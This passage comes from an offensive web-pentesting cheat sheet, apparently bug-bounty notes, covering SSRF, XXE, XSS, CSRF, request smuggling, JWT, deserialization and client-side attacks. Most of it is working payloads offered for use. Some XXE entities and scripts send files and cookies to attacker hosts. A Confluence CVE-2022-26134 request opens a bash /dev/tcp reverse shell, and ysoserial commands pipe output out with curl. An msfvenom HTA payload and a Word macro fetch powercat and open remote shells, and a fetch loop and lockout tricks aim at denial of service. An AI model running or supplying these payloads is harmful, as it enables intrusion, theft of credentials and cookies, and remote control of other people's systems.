. In this situation, you can often circumvent the filter using various techniques:
- Using an alternative IP representation of
127.0.0.1
, such as2130706433
,017700000001
, or127.1
; - Registering your own domain name that resolves to
127.0.0.1
. You can use spoofed.burpcollaborator.net for this purpose or the domainfirefox.fr
is a DNS that point to127.0.0.1
.; - Obfuscating blocked strings using URL encoding or case variation.
SSRF with whitelist-based input filters bypass
- You can embed credentials in a URL before the hostname, using the
@
character. For example:https://expected-host@evil-host
. - You can use the
#
character to indicate a URL fragment. For example:https://evil-host#expected-host
. - You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example:
https://expected-host.evil-host
. - You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
- You can use combinations of these techniques together.
Other tips
- By combining it with an Open redirection, you can bypass some restrictions. An example:
http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
- For AWS, bypass some restrictions by hosting this PHP page [Reference]
<?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?>
- If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [Reference]
- SSRF (Server Side Request Forgery) testing resources
Common endpoints
- Webhooks
- Try to send requests to internal resources
- PDF Generator
- If there is an HTML Injection in a PDF generator, try call internal resources with something like
<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" title="SSRF test">
, with these tags<img>
,<script>
,<base>
or with the CSS elementurl()
- If there is an HTML Injection in a PDF generator, try call internal resources with something like
- Document parsers
- If it's an XML doc, use the PDF Generator approach
- In other scenarios, see if there is any way to reference external resources and let server make requests to internal resources
- Link expansion, [Reference]
- File uploads
- Instead of uploading a file, upload a URL. An example
- Use an SVG file
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image xlink:href="https://example.com/test.png"/> </svg>
Common payloads
http://127.0.0.1
http://localhost/
http://169.254.169.254/
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
https://kubernetes.default.svc/metrics
[Random Robbie's tweet]
Resources
Bypasses
- https://attacker.com?victim.com
- https://attacker.com;victim.com
- https://attacker.com/victim.com/../victimPATH
- https://victim.com.attacker.com
- https://attackervictim.com
- https://[email protected]
- https://attacker.com#victim.com
- https://attacker.com\.victim.com
- https://attacker.com/.victim.com
- https://subdomain.victim.com/r/redir?url=https%3A%2F%2Fvictim.com%40ATTACKER_WEBSITE.COM?x=subdomain.victim.com%2f
- https://www.victim.com/redir/r.php?redirectUri=https://attacker%E3%80%82com%23.victim.com/
- https://www.victim.com/redir/r.php?redirectUri=/%0d/attacker.com/
- Exploiting XXE to retrieve files
OriginalModified<?xml version="1.0" encoding="UTF-8"?> <stockCheck><productId>381</productId></stockCheck>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck>
- Exploiting XXE to perform SSRF attacks
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerablewebsite.com/"> ]>
- Exploiting blind XXE exfiltrate data out-of-band
Example<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com"> %xxe; ]>
- Exfiltrate data out-of-band
for-the-malicious-web-server.dtdSubmit to vulnerable server<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://webattacker.com/?x=%file;'>"> %eval; %exfil;
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://webattacker.com/malicious.dtd"> %xxe;]>
- Exploiting blind XXE to retrieve data via error messages
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error;
- Exploiting blind XXE by repurposing a local DTD
Suppose there is a DTD file on the server filesystem at the location/usr/local/app/schema.dtd
To locate the DTD file, submit the payload<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"> <!ENTITY % custom_entity ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; '> %local_dtd; ]>
<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> %local_dtd; ]>
- Try with xinclude to achieve SSRF or LFI
<?xml version="1.0" encoding="utf-8" ?> <username xmls:xi="https://w3.org/2001/XInclude"> <xi:include parse="text" href="file:///c:/windows/win.ini"> </username>
Attack surfaces
- XInclude attacks
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/></foo>
- XXE attacks via file upload with
.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITYxxe SYSTEM "file:///etc/hostname" > ]> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <text font-size="16" x="0" y="16">&xxe;</text> </svg>
- XXE attacks via modified content type
For example, Content-Type:application/x-www-form-urlencoded
->Content-Type: text/xml
Manually testing for XXE vulnerabilities generally involves
- Testing for file retrieval
- Testing for blind XXE vulnerabilities
- Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document
- Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read
- Exploiting XSS via Markdown
- XSS to Exfiltrate Data from PDFs
- How to craft an XSS payload to create an admin user in WordPress
- xsscrapy
- For blind XSS
- AwesomeXSS
- Weaponised XSS payloads
- Cross-site scripting (XSS) cheat sheet
- XSS all the things some payloads to find XSS in various places
- JSCompress
- https://www.googleapis.com/customsearch/v1?callback=alert(document.domain)
- JSFuck
- Path Relative style sheet injection
- Shortest rXSS possible
- If Privileges are required, see if you can chain the XSS with a CSRF
- Insert a payload in the User-Agent, try with the match/replace rule
- Other endpoints: pending review comments, feedback
- swagger-api/swagger-ui#1262
- swagger-api/swagger-ui#3847
?url=https://raw.githubusercontent.com/seeu-inspace/easyg/main/XSS%20all%20the%20things/swag-test.json
- Hacking Swagger-UI - from XSS to account takeovers
?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3NlZXUtaW5zcGFjZS9lYXN5Zy9tYWluL1hTUyUyMGFsbCUyMHRoZSUyMHRoaW5ncy9zd2FnLXRlc3QueWFtbCIKfQ==
- Nuclei template
%USERPROFILE%\nuclei-templates\exposures\apis\swagger-api.yaml
/%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
/%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
- Nuclei template
%USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml
- HTML injection
-
<p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">
-
<div style="background-color:white;position:fixed;width:100%;height:100%;top:0px;left:0px;z-index:1000;margin: auto;padding: 10px;"><p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a></div>
-
- For hidden inputs:
accesskey="X" onclick="alert(1)"
then Press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X - For mobile applications: try to use as a vector the name of the phone with a payload like
"/><script>alert(1)</script>
- XSS Without parentheses
- iframe + base64 encoded SVG
<iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjEwMCIgc3R5bGU9ImZpbGw6cmdiKDAsMCwyNTUpO3N0cm9rZS13aWR0aDozO3N0cm9rZTpyZ2IoMCwwLDApIiAvPgogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgICAgIGFsZXJ0KGRvY3VtZW50LmRvbWFpbik7CiAgIDwvc2NyaXB0Pgo8L3N2Zz4="></iframe>
- Small SVG base64
data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxyZWN0IHdpZHRoPSIxIiBoZWlnaHQ9IjEiLz48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PC9zdmc+
- Cookie stealers
-
fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie});
-
document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '\" />')
-
<img src=x onerror=this.src='http://ATTACKER-WEBSITE/?x='+document.cookie;>
-
- Unusual events
onpointerrawupdate
(Chrome only)onmouseleave
- Can't use
alert
,confirm
orprompt
? Tryprint()
! [Reference] - This lead the page to make a loop of requests, eventually causing being blocked by a WAF and being a potential DoS
for(;;){fetch('https://VICTIM/',{method:'GET'});}
-
%253c%252fscript%253e%253cscript%253ealert(document.cookie)%253c%252fscript%253e
-
<a href="jAvAsCrIpT:alert(1)">payload</a>
-
%22%20onbeforeinput=alert(document.domain)%20contenteditable%20alt=%22
-
1672&81782%26apos%3b%3balert(%26apos%3bXSS%26apos%3b)%2f%2f232=1
-
<svg/onload=alert(0)>
-
<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>
-
<a href=jav%26%23x61%3bscript:alert()>
-
data:text/javascript,console.log(3 + '\n' + `};console.log(1);//<img src=x onerror=javascript:console.log(2) oncopy=console.log(4)>`);//" onerror=console.log(5) id="x
- For the challenge 5Ways2XSS - DOJO #23 | YesWeHack
-
%22-alert(document.cookie)-%22
-
%00%22%3E%3Cimg%20src%3da%20onerror%3dconfirm(document.domain)%3E
XSS -> ATO Escalation [Reference]
- Change email > Password reset
- Change phone number > SMS password reset
- Add SSO (Google, Github etc.)
- Add authentication method (email, sms etc.) > Password reset
- Change password
- Change security questions
- Cross Site Tracing: If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. [Reference]
- Steal Cookies
- Steal API key
- Add admin user to the application
- Hijack oAuth flow and steal code
- Steal SSO code to adjacent app, then reverse SSO back to main app
- Remove the entire token
- Use any random but same-length token, or
same-length+1
/same-length-1
- Use another user's token
- Change from
POST
toGET
and delete the token - If it's a
PUT
orDELETE
request, tryPOST /profile/update?_method=PUT
orPOST /profile/update HTTP/1.1 Host: vuln.com ... _method=PUT
- If the token it's in a custom header, delete the header
- Change the
Content-Type
toapplication/json
,application/x-url-encoded
orform-multipart
,text/html
,application/xml
- If there is double submit token, try CRLF injection
- Bypassing referrer check
- If it's checked but only when it exists, add to the PoC
<meta name="referrer" content="never">
- Regex Referral bypass
- https://attacker.com?victim.com - https://attacker.com;victim.com - https://attacker.com/victim.com/../victimPATH - https://victim.com.attacker.com - https://attackervictim.com - https://[email protected] - https://attacker.com#victim.com - https://attacker.com\.victim.com - https://attacker.com/.victim.com
- If it's checked but only when it exists, add to the PoC
- CSRF token stealing via XSS/HTMLi/CORS
- JSON based
- Change the
Content-Type
totext/plain
,application/x-www-form-urlencoded
,multipart/form-data
- Use flash + 307 redirect
- Change the
- Guessable CSRF token
- Clickjacking to strong CSRF token bypass
- Type juggling
- Use array, from
csrf=token
tocsrf[]=token
- Set the CSRF token to null or add null bytes
- Check whether CSRF token is sent over http or sent to 3rd party
- Generate multiple CSRF tokens, pick the static part. Play with the dynamic part
Resources
Classic CORS vulnerability
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://<TARGET-URL>',true);
req.withCredentials = true;
req.send();
function reqListener() {
alert(this.responseText);
};
</script>
CORS vulnerability with null origin
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://<TARGET-URL>',true);
req.withCredentials = true;
req.send();
function reqListener() {
alert(this.responseText);
};
</script>">
</iframe>
Resources
- Corsy Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations
- What is CORS (cross-origin resource sharing)? Tutorial & Examples | Web Security Academy
Classic PoC
<style>
iframe {
position:relative;
width:$width_value;
height: $height_value;
opacity: $opacity;
z-index: 2;
}
div {
position:absolute;
top:$top_value;
left:$side_value;
z-index: 1;
}
</style>
<div>Click me button</div>
<iframe src="$url"></iframe>
Resources
Many DOM-based vulnerabilities can be traced back to problems with the way client-side code manipulates attacker-controllable data.
- document.URL
- document.documentURI
- document.URLUnencoded
- document.baseURI
- location
- document.cookie
- document.referrer
- window.name
- history.pushState
- history.replaceState
- localStorage
- sessionStorage
- IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
- Database
DOM-based vulnerability | Example sink |
---|---|
DOM XSS | document.write() |
Open redirection | window.location |
Cookie manipulation | document.cookie |
JavaScript injection | eval() |
Document-domain manipulation | document.domain |
WebSocket-URL poisoning | WebSocket() |
Link manipulation | someElement.src |
Web-message manipulation | postMessage() |
Ajax request-header manipulation | setRequestHeader() |
Local file-path manipulation | FileReader.readAsText() |
Client-side SQL injection | ExecuteSql() |
HTML5-storage manipulation | sessionStorage.setItem() |
Client-side XPath injection | document.evaluate() |
Client-side JSON injection | JSON.parse() |
DOM-data manipulation | someElement.setAttribute() |
Denial of service | RegExp() |
Any web security vulnerability might arise in relation to WebSockets:
- User-supplied input transmitted to the server might be processed in unsafe ways, leading to vulnerabilities such as SQL injection or XML external entity injection;
- Some blind vulnerabilities reached via WebSockets might only be detectable using out-of-band (OAST) techniques;
- If attacker-controlled data is transmitted via WebSockets to other application users, then it might lead to XSS or other client-side vulnerabilities.
Cross-site WebSocket hijacking (CSRF missing)
<script>
websocket = new WebSocket('wss://websocket-URL');
websocket.onopen = start;
websocket.onmessage = handleReply;
function start(event) {
websocket.send("READY");
}
function handleReply(event) {
fetch('https://your-domain/?'+event.data, {mode: 'no-cors'});
}
</script>
How to spot Insecure deserialization
- PHP example
O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}
- Java objects always begin with the same bytes
- Hex
ac
ed
- Base64
rO0
- Hex
- .NET vulnerable deserarilaztion libraries: BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter
- BinaryFormatter serialized objects usually starts with
AAEAAAD
Ysoserial
Because of Runtime.exec()
, ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using sh -c $@|sh . echo
before the multiple commands that we need to run. Here I needed to run the command host
and whoami
:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-RATOR-ID>.burpcollaborator.net' | gzip | base64
Other options
java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections4 "id"
- See this
Ysoserial.net
Windows Defender might tag the application as virus.
.\ysoserial.exe -g ClaimsPrincipal -f BinaryFormatter -c 'whoami | curl --data-binary @- http://yourcollaboratorserver' -bgc ActivitySurrogateDisableTypeCheck --minify --ust
PHPGGC
PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.
Burp extensions
- Java Deserialization Scanner
- Java Serialized Payloads
- GadgetProbe
- Freddy, Deserialization Bug Finder
- PHP Object Injection Check
- Try fuzzing the template by injecting a sequence of special characters commonly used in template expressions, such as
${{<%[%'"}}%\
. To identify the template engine submit invalid syntax to cause an error message. - The next step is look for the documentation to see how you can exploit the vulnerable endpoints and known vulnerabilities/exploits.
- Use payloads like these
{{7*7}}[[3*3]] {{7*7}} {{7*'7'}} <%= 7 * 7 %> ${7*7} ${{7*7}} @(7+7) #{7*7} #{ 7 * 7 }
Constructing a web cache poisoning attack
- Identify and evaluate unkeyed inputs
- Elicit a harmful response from the back-end server
- Get the response cached
Cache key flaws Many websites and CDNs perform various transformations on keyed components when they are saved in the cache key:
- Excluding the query string
- Filtering out specific query parameters
- Normalizing input in keyed components
Cache probing methodology
- Identify a suitable cache oracle
- Simply a page or endpoint that provides feedback about the cache's behavior. This feedback could take various forms, such as: An HTTP header that explicitly tells you whether you got a cache hit, Observable changes to dynamic content, Distinct response times
- Probe key handling
- Is anything being excluded from a keyed component when it is added to the cache key? Common examples are excluding specific query parameters, or even the entire query string, and removing the port from the Host header.
- Identify an exploitable gadget
- These techniques enable you to exploit a number of unclassified vulnerabilities that are often dismissed as "unexploitable" and left unpatched.
- "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [Reference];
- Carriage Return Line Feed (CRLF) injection: "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [Reference]
Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends:
- Content-Length
POST /search HTTP/1.1 Host: normal-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 11 q=smuggling
- Transfer-Encoding
POST /search HTTP/1.1 Host: normal-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked b q=smuggling 0
Example
POST / HTTP/1.1
Host: smuggle-vulnerable.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
Result: GPOST request
- Some servers do not support the Transfer-Encoding header in requests;
- Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is obfuscated in some way.
Ways to obfuscate the Transfer-Encoding header
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
-
Transfer-Encoding : chunked
Confirming CL.TE vulnerabilities using differential responses
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked
e
q=smuggling&x=
0
GET /404 HTTP/1.1
Foo: x
Result
GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
q=smuggling
Impact
- Bypass front-end security controls
- Revealing front-end request rewriting
- Capturing other users' requests
- Using HTTP request smuggling to exploit reflected XSS
- Turn an on-site redirect into an open redirect
Example of 301 in Apache and IIS web serversVulnerable requestGET /home HTTP/1.1 Host: normal-website.com HTTP/1.1 301 Moved Permanently Location: https://normal-website.com/home/
ResultPOST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 54 Transfer-Encoding: chunked 0 GET /home HTTP/1.1 Host: attacker-website.com Foo: X
GET /home HTTP/1.1 Host: attacker-website.com Foo: XGET /scripts/include.js HTTP/1.1 Host: vulnerable-website.com HTTP/1.1 301 Moved Permanently Location: https://attacker-website.com/home/
- Perform web cache poisoning
- Perform web cache deception
Resource
A JWT consists of a header
, a payload
, and a signature
. Each part is separated by a dot.
Common attacks
- Accepting tokens with no signature
- Brute-forcing secret keys using hashcat
- You need a valid JWT and a wordlist
hashcat -a 0 -m 16500 <jwt> <wordlist>
- If any of the signatures match, hashcat will give you an output like this
<jwt>:<identified-secret>
along with other details - Once identified the secret key, you can use it to generate a valid signature for any JWT header and payload that you like. See Signing JWTs
- Injecting self-signed JWTs via the
jwk
,jku
orkid
parameter - Change Content-Type in
cty
to achieve XXE and deserialization attacks x5c
(X.509 Certificate Chain) can lead to CVE-2017-2800 and CVE-2018-2633- JWT algorithm confusion
Resources
How OAuth 2.0 works:
Client application
The website or web application that wants to access the user's data;Resource owner
The user whose data the client application wants to access;OAuth service provider
The website or application that controls the user's data and access to it. They support OAuth by providing an API for interacting with both an authorization server and a resource server.
Following standard endpoints:
/.well-known/oauth-authorization-server
/.well-known/openid-configuration
Vulnerabilities in the client application
- Improper implementation of the implicit grant type
- Flawed CSRF protection
Vulnerabilities in the OAuth service
- Leaking authorization codes and access tokens
- Flawed scope validation
- Unverified user registration
To analyze the schema: vangoncharov.github.io/graphql-voyager/ or InQL for Burp Suite.
GraphQL Introspection query
{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n __schema {\n queryType {\n name\n }\n mutationType {\n name\n }\n subscriptionType {\n name\n }\n types {\n ...FullType\n }\n directives {\n name\n description\n locations\n args {\n ...InputValue\n }\n }\n }\n}\n\nfragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n}\n\nfragment InputValue on __InputValue {\n name\n description\n type {\n ...TypeRef\n }\n defaultValue\n}\n\nfragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n }\n }\n }\n }\n}\n"}
- Information Disclosure [high]:
/_wpeprivate/config.json
- Data exposure:
/wp-json/wp/v2/users/
/wp-json/th/v1/user_generation
/?rest_route=/wp/v2/users
- xmlrpc.php enabled, reference. Send a post request to this endpoint with a body like this:
<?xml version="1.0" encoding="utf-8"?> <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
- Use Nuclei to detect WordPress websites from a list of targets with:
nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml
- Scan with WPScan github.com/wpscanteam/wpscan with
wpscan --url <domain> --enumerate u
enumerate userswpscan --url <domain> -U users.txt -P password.txt
try to find valid credentialswpscan --url <domain> --api-token <your-api-token>
wpscan --url <target> --enumerate p --plugins-detection aggressive -o results
wpscan --url https://example[.]com --api-token <api token> --plugins-detection mixed -e vp,vt,cb,dbe,u1-10 --force
[source]
- Nuclei templates
%USERPROFILE%\nuclei-templates\vulnerabilities\wordpress
Resources
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
- WordPress Checklist
- Check if
trace.axd
is enabled - Search for
Views/web.config bin/WebApplication1.dll System.Web.Mvc.dll System.Web.Mvc.Ajax.dll System.Web.Mvc.Html.dll System.Web.Optimization.dll System.Web.Routing.dll
- Other common files
Resources
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services
- Wordlist iisfinal.txt
- Find Lotus Domino with nuclei:
%USERPROFILE%\nuclei-templates\technologies\lotus-domino-version.yaml
- Exploit DB: Lotus-Domino
- Fuzzing list: SecLists/LotusNotes.fuzz.txt
Once you have the source code, look for the secrets within the files. To find secrets, you can use trufflehog.
Other tools
- DotGit find if a website has
.git
exposed - nuclei template
%USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml
- GitDumper from GitTools
Tools
- Can I take over XYZ?
- nuclei template
%USERPROFILE%\nuclei-templates\takeovers
- byp4xx, s/o to m0pam for the tip
- Search for subdomain with subfinder. Httpx filters subdomains with a 403 response and prints their cname. Test the cname for a bypass
subfinder -d atg.se — silent | httpx -sc -mc 403 -cname
, s/o to drak3hft7 for the tip - 403 Bypasser Burp extension, test 403 bypasses on the run
- Replace
HTTP/n
withHTTP/1.1
,HTTP/2
orHTTP/3
- Change the request from
GET
toPOST
or viceversa
- If the application gives the possibility to download data, try to download too much data
- If there are restrictions, try to bypass
- In file uploads, try to upload huge files
- In chat section, try to send big messages and see how the application behaves
- Regular expression Denial of Service - ReDoS
- search for
RegExp()
- search for
- Long Password DoS Attack (Note: the value of password is hashed and then stored in Databases)
- Check for length restriction and play with it
- If there is no restriction, test until the application slows down
- password.txt
- Long string DoS
- DoS against a victim
- Sending a reset link might disable an user's account, spam to prevent the user from accessing their account
- Multiple wrong passwords might disable an user's account
Common API path convention: /api_name/v1
- Create a pattern file
echo {GOBUSTER}/v1 > patterns echo {GOBUSTER}/v2 >> patterns echo {GOBUSTER}/v3 >> patterns
- Run the command
gobuster dir -u <TARGET> -w /usr/share/wordlists/wordlist.txt -p patterns
- Inspect the endpoints fuond with
curl
and use recursion
CVE-2021-43798: Grafana versions 8.0.0-beta1 through 8.3.0, except for patched versions, are vulnerable to directory traversal
curl --path-as-is http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
- Check also for sqlite3 database
/var/lib/grafana/grafana.db
andconf/defaults.ini
config file
- Check also for sqlite3 database
- See: Active Exploitation of Confluence CVE-2022-26134
curl http://<Confluence-IP>:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/<YOUR-IP>/<YOUR-PORT>%200%3E%261%27%29.start%28%29%22%29%7D/
- Run a listener
nc -nvlp 4444
Passive Client Information Gathering
- Search with Google, social media and forum websites
- Search for IPs and other sensible information
- Search for file in the target's websites with
dirsearch
orgobuster
, retrieve metadata from filesexiftool -a -u brochure.pdf
Active Client Information Gathering
- Make direct contact with the target machine or its users
- Interaction with the target: Social engineering, require to click on a link, open an email, run an attachment, or open a document
- Social-Engineer Toolkit (SET)
- Client Fingerprinting
- Fingerprintjs2
- Change permissions on the
fp
directorysudo chown www-data:www-data fp
to make/fp/js.php
work
- Change permissions on the
- Parse User Agents
- Fingerprintjs2
- Use Canarytokens and Social Engineering to retrieve information from a target
- Use Grabify IP Logger
If a file is created with a .hta
extension rather than a .html
extension, Internet Explorer will automatically recognize it as an HTML Application and provide the option to run it using the mshta.exe application (still useful since many corporations rely on Internet Explorer).
PoC.hta leveraging ActiveXObjects
<html>
<head>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>
self.close();
</script>
</body>
</html>
Create a better payload with msfvenom from the Metasploit framework
sudo msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f hta-psh -o /var/www/html/evil.hta
In evil.hta, the code will find the following command ::> `powershell.exe -nop -w hidden -e aQBmCgAWBJAG4AdAQAHQAcg...`
-nop: NoProfile
-w: WindowStyle hidden
-e: EncodedCommand
Microsoft Word Macro: To exploit Microsoft Office we need to creare a doc in .docm
or .doc
format and use macros. An example of the creation of a macro to run a reverse shell is the following.
- From your powershell, prepare the command encoded in base64
$TEXT = "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1');powercat -c <LHOST> -p <LPORT> -e powershell" $ENCODED = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($TEXT)) echo $ENCODED
- Since VBA has a 255-character limit for literal strings, we have to split the command into multiple lines. You can do it with the following python script:
import sys str = "powershell.exe -nop -w hidden -e " + sys.argv[1] n = 50 for i in range(0, len(str), n): print ("Str = Str + " + '"' + str[i:i+n] + '"')
- This will be the final result:
